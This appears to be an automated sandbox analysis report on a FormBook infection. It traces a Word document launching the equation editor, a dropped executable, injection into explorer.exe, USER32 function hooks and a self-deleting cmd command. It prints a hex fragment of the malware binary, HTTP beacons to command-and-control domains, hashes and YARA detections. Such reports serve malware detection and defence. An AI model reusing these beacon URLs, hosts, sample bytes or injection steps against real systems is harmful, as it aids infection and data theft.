                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 16 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 88 0b 00 00 98 01 00 00 00 00 00 d2 a7 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 a7 0b 00 4f 00 00 00 00 c0 0b 00 4c 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d8 87 0b 00 00 20 00 00 00 88 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4c 94 01 00 00 c0 0b 00 00 96 01 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 a7 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 98 53 02 00 03 00 00 00 8c 02 00 06 80 20 04 00 00 87 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 2a 00 00 0a 6f 27 00 00 0a 58 20 29 55 55 a5 5a 28 2c 00 00 0a 02 7b 2b 00 00 0a 6f 2e 00 00 0a 58 2a 00 00 00 13 30 07 00 88 00 00 00 04 00 00 11 14 72 25 00 00 70 18 8d 17 00 00 01 25 16 02 7b 2a 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 25 17 02 7b 2b 00 00 0a 0c 12 02 12 03 fe 15 06 00 00 1b 09 8c 06 00 00 1b 2d 14 71 06 00 00 1b 0d 12 03 09 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0 @ @OL` H.text `.rsrcL@@.reloc` @BHS {#*:($}#*0$u,(%{#{#o&+*v l )UUZ(%{#o'X*0Mrp%{#-q-&+o(()*{**{+*V($}*}+*0<u,0(%{*{*o&,(,{+{+o-+* pi| )UUZ(%{*o'X )UUZ(,{+o.X*0r%p%{*-q-&+o(%{+-q-&+


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.2249166198.54.117.21580C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 14:12:17.802289009 CEST902OUTGET /hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS HTTP/1.1
                                                    Host: www.ceasa.club
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.2249167166.62.10.13880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 27, 2021 14:12:38.502983093 CEST903OUTGET /hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dS HTTP/1.1
                                                    Host: www.alzayantourism.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 27, 2021 14:12:38.766200066 CEST903INHTTP/1.1 404 Not Found
                                                    Date: Mon, 27 Sep 2021 12:12:38 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: USER32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEA
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEA
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEA
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEA

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:14:10:23
                                                    Start date:27/09/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13ff10000
                                                    File size:1423704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:14:10:24
                                                    Start date:27/09/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:10:26
                                                    Start date:27/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\hasmenhtk721.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\hasmenhtk721.exe
                                                    Imagebase:0xbb0000
                                                    File size:860672 bytes
                                                    MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 29%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Start time:14:10:32
                                                    Start date:27/09/2021
                                                    Path:C:\Users\user\AppData\Roaming\hasmenhtk721.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\hasmenhtk721.exe
                                                    Imagebase:0xbb0000
                                                    File size:860672 bytes
                                                    MD5 hash:DFF3BF025DCD487A2F0FB22B4CCF8998
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:14:10:33
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xffa10000
                                                    File size:3229696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Start time:14:10:48
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                    Imagebase:0x70000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Start time:14:10:52
                                                    Start date:27/09/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
                                                    Imagebase:0x4aa40000
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >